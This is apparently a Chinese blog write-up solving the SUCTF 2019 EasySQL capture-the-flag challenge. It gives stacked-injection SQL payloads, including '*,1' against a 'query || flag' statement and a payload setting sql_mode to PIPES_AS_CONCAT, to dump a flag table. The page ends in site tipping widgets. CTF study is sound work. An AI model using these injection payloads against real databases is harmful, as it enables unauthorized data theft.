[SUCTF 2019]EasySQL 1

本文探讨了SQL注入攻击的常见方法,包括利用'||'符号进行堆叠注入的尝试。作者通过分析代码示例解释了如何构造payload绕过防护,成功查询数据库中的敏感信息。同时提到了通过设置sql_mode=pipes_as_concat来改变'||'的行为,增加系统安全性。博客还提醒读者关注SQL语句的拼接方式,防止注入漏洞。
摘要由CSDN通过智能技术生成

方法一

尝试很多常规的注入方法都不行。
想到使用堆叠注入
查询下数据库
堆叠注入
查询数据表
数据表
1;show columns from Flag;#
尝试查看flag中数据,失败。
失败
之后看了WP,发现代码中语句是这样的,select $_GET['query'] || flag from flag,"||"在mysql中表示或,如果前一个操作数为真,则不看后面的语句,构造payload:*,1

sql=select.post['query']."||flag from Flag";
如果$post['query']的数据为*,1,sql语句就变成了select *,1||flag from Flag,
就是select *,1 from Flag,这样就直接查询出了Flag表中的所有内容。

拿到
select 1 from,会返回每一行都为值1的数据,这将方便数据库进行统计。具体讲解

方法二

通过设置sql_mode=pipes_as_concat将 ‘ || ’ 改为字符串连接符。
payload:1;set sql_mode=PIPES_AS_CONCAT;select 1
fangfaer
详细mode配置链接

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Godams

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值